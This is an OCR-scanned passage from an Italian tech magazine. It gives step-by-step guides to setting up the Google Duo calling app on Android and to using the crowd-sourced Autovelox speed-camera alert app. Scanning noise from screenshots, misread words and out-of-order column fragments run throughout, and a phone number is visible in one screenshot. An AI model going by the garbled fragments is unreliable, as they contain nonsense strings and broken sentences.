i minuti a disposizione? Per evitare di mettere 


mano al portafogli ed effettuare una chiamata 
a pagamento possiamo affidarci alla nuova app 
Google Duo che ci permette di chiamare e vi- 
deo chiamare tutti i nostri contatti (che hanno 
installato l’app) senza spendere un solo cen- 
tesimo. La chiamata, infatti, viene effettuata 
utilizzando la connettività a Internet del nostro 


smartphone o tablet Android. Inoltre, per non 
consumare troppi MB (se siamo connessi tra- 
mite la rete 3G/4G) è possibile attivare un’op- 
zione che ottimizza la banda, sia nel caso di 
una chiamata vocale che video. Cos'altro 
aspettiamo? Installiamo subito Google Duo e 
consigliamola ai nostri contatti! 


tp SA 


Google Duo 


DOWNLOAD 
01 incorso 
Soria Ru L'app è disponibile 
11 peois sia su tablet che su smartpho- 


Più di 50.000.000 di download 


000 


5463.1042 Comunicazione Simo 


Scopri Google Duo, una semplice app per 
videochiamate adatta a tutti 


Video di atta i 


ne. Verifichiamo quindi che il 
nostro device sia attualmente 
connesso ad una rete senza 
fili o che sia attiva la connet- 
tività mobile 36/4G e accedia- 
mo al Play Store. Ricerchiamo 
l'app Google Duo e tappiamo 
sul pulsante Installa per pro- 


cedere al download. 
QX 49138 11:54 
NSA I GIUSTI 
Per effettuare chiamate, concedere 7 
l'accesso a microfono, videocamera 3 PERMESSI 


e contatti. Inoltre, semplifica la 
verifica del tuo numero di telefono 
consentendo a Duo di leggere gli SMS. 


do 
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CONCEDI ACCESSO 
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Affinché Google 
Duo possa funzionare è ne- 
cessario concedere alcuni 
permessi. Nel dettaglio, 
l'utilizzo del microfono, 
della videocamera [fronta- 
le e posteriore] e dell'elen- 
co dei contatti presenti sul 
device. Proseguiamo con 
un tap su Concedi 
Accesso e, successivamen- 
te, con Concedi. 


Videochiamate semplici e 
gratuite 


Se continui, accetti Norme sulla privacy e 
Termini di servizio. Inoltre, potrai trovare i 
tuoì amici molto facilmente se consenti a 
Duo di sincronizzare i tuoi contatti. 


INIZIA 
93 scr rERA 


Verifica il tuo numero 


Italia (+39) 


AVANTI > 


CONFIGURAZIO- 
02 NEINIZIALE 

Quando l’app sarà 
scaricata ed installata, 
ricerchiamola dal menu 
principale del nostro smar- 
tphone o tablet Android 
ed avviamola. Inizia quindi 
la procedura guidata di 
configurazione iniziale (che 
dura solo qualche secondo). 
Accettiamo le condizioni 
d'uso con un tap su Inizia. 


‘=. ILNUMERO 
04 piteLEFONO 
Nella nuova 
schermata che appare, in- } 


dichiamo il nostro numero 
di telefono, preceduto dal 
prefisso internazionale 
(+39 per l’Italia). Ciò poiché 
Google Duo farà individua- 
re ai nostri contatti che an- 
che noi abbiamo installato 
l'app sul nostro telefonino 
{solo a chi usa già Duo). 
Proseguiamo con Avanti. 


Impostazioni 


Vibrazione durante lo squillo 


Toc Toc i 
Attiva i 
i 
Limita l'utilizzo dei dati mobili ® È 
Ricevi avvisi quando î tuoi contatti iniziano a ® 
usare Duo 
È 
Novità su è 
i È È 
Ricevi 209! ulle move funzioni i 
È 
Numeri bloccati È 
do 
Numero di telefono [i 
+39. 393 230 3547 È 
È 
Annulla registrazione del numero i 
dr: 


i 


chiamata 
pa oiAl a cnliarialioi 


Al termine della 
configurazione iniziale 

di Google Duo, apparirà 
l'interfaccia principale 
dell’app. Spostiamoci nel 
menu Impostazioni: da qui 
verifichiamo che sia attiva 
l'opzione Limita l’utiliz- 
zo dei dati mobili che ci 
permette di ottimizzare la 
banda quando non siamo 
connessi ad una rete Wi-Fi. 


È MO! 
Riportiamo lo switch su 
Video. Nella parte centra- 
le dell'interfaccia viene 
mostrato ciò che la foto- 
camera frontale del device 
Android sta riprendendo: 
si tratta di un'antepri- 

ma che ci mostra cosa 
vedranno i nostri contatti 
nel momento in cui partirà 
una nuova chiamata video: 
è il momento di pettinarsi! 


Quando il nostro 


contatto avrà risposto 
alla chiamata, vederemo 
apparire la sua immagine 
su tutto lo schermo. In 
basso a sinistra, vedremo 
ciò che viene inquadrato 
dalla nostra fotocamera 
frontale. Alcuni pulsanti 
presenti su schermo ci 
permettono di passare 
alla fotocamera posterio- 
re o disattivare il microfo- 
no in un tap. 


Nuova chiamata 


III enim 


Gi i 


Mg?” Celuiare - +39 
Cellulare - +39 


Cellulare » +39 


Paolo © 
Cellulare » +39 


oFarenrio, 


Tieni traccia delle tue 
chiamate Duo 


Per aggiungere la cronologia delle 
chiamate Duo alla cronologia delle 
chiamate del telefono, consenti 

a Duo di gestire e di effettuare 
chiamate. 


FEZETERT TRANI TTT IENA TSE IPO ONTANI AINSI ti ISIS TIZI ZZZ SO 


i 
È 
| 
È 


Ritorniamo all'in- 
terfaccia grafica princi- 
pale dell'app. In alto è 
presente lo slider Video/ 
Audio. Switchando su 
Audio, Google Duo ci per- 
metterà di effettuare una 
chiamata vocale, dunque 
senza attivare la fotoca- 
mere frontale o posterio- 
re del nostro smartphone 
o tablet Android. 


Tappiamo ora sul pulsante 
Nuova chiamata. Viene mo- 
strato l'elenco dei contatti 
presenti in rubrica che 
hanno già installato Goo- 
gle Duo [possiamo anche 
effettuare una ricerca per 
nome o pér numero utiliz- 
zando l'apposito campo). 
Tappiamo sul contatto di 
nostro interesse per av- 
viare la chiamata video. 


Al termine della 
conversazione (pulsante 
rosso che raffigura una 
cornetta], Google Duo ci 
chiederà se tenere traccia 
delle chiamate Duo. Ciò ci 
permette di aggiungere le 
chiamate e video chiama- 
te effettuate tramite l'app 
nel registro telefonate 
del nostro device Android. 
Scegliamo Consenti o No, 
grazie a seconda delle 
nostre preferenze. 
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#08 Ti CE SCA rd 


MAI PIÙ AUTOVELOX! 


Forse non lo sai, ma c’è un’app che ti aiuta a tenere alla larga le multe 
per eccesso di velocità. Ecco come si chiama e come utilizzarla 


ispettare i limiti di velocità è im- 
portante per garantire la propria 
incolumità e quella degli altri 


guidatori. Ma alle volte, basta sgarrare 
di pochi Km/h (in alcuni casi anche 1!) 
per vedersi recapitare a casa una salata 
multa da pagare. Dopotutto, se il limite 
è stato superato, è giusto che sia cosi. Ci 
vorrebbe un’app che ci aiuti a rilevare le 
strada in cui sono presenti autovelox, var- 


chi tutor o semafori T-red. Quest’app c’è 
ed il suo nome è, banalmente, Autovelox. 
Il suo utilizzo non è per nulla illegale: 
non dimentichiamo, infatti, che anche i 
più moderni navigatori GPS disponibi- 
li sul mercato integrano un database con 
tutte le postazioni autovelox fisse instal- 
late sulle strada italiane. Ma, il più del- 
le volte, quelle mobili vengono ignorate. 
L’app Autovelox, è una social app e, di 


Pochi tap e sei al sicuro 


Scarichiamo l’app e mettiamola subito in funzione 


Autovelox! A 
SoftBoom ; 
fi EI PEG:3 


Pià di 7.000.000 di 
dounicad 


Trasforma GRATIS il tuo dispositivo 
___Androidinun rilevatore di Autovelox! 


SEGNALA POSTAZIONE 
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che il nostro smartphone 
sia connesso a Internet 
| (tramite un hotspot Wi-Fi 
| olarete mobile 36/4G] e 
 accediamo al Play Store. 
| Da qui ricerchiamo l’app 
gratuita Autovelox. Tap- 
piamo quindi sul pulsante 
Installa e, successivamen- 
. te, su Accetto. Attendiamo 
' la fine del download. 


LA MAPPA 

03 Grazie all’inte- 

I grazione con la 
; cartografia di Google 
Maps, possiamo visua- 
lizzare la Mappa della 
zona in cui ci troviamo. 
Tappiamo sull'omonima 
voce presente nel menu 
in alto e, esplorando la 
mappa possiamo accor- 
gerci se nei paraggi è 

. presente una postazione 
‘. autovelox fissa o mobile, 
. ounsemaforo T-Red. 


SUL PLAY 
STORE 


Verifichiamo 


Autovelox mobile 


“conseguenza, con la collaborazione di 
tutti, c'è una grande probabilità che an- 
che una postazione mobile venga rilevata 
poiché già segnalata da altri utilizzatori 

Non dimentichiamo 

però che è vietato dalla legge utilizzare lo 
smartphone mentre si è alla guida: dun- 

que, se vogliamo, avviamo l’app prima di 


dell’applicazione. 


partire ma non distogliamo mai lo sguar- 
do dalla strada e le mani dal volante! 


LA HOME 
' 02 screen 
Avviamo l'app e 
. accettiamo le condizioni 
d'uso. Se siamo in movi- 
mento, ci verrà indicata la 
velocità di percorrenza, 
nonché quella di picco. Le 
postazioni autovelox ver- 
ranno mostrate in questa 
schermata. Qualora non 
ce ne siano, verrà mostra- 
to il messaggio Nessuna 
segnalazione. 


NUOVA 
04 SEGNALAZIONE 
Nel tab Mappa 
tappiamo su Segnala 
‘ postazione, il risvolto 
social di quest’app. Nella 
nuova schermata che 
| appare selezioniamo la 
tipologia di controllo 
[Autovelox fisso, Autove- 
lox mobile, Varco Tutor, 
ecc.) e il limite di velo- 
cità imposto. Possiamo 
| segnalare anche Code o 
"un Pericolo generico. 


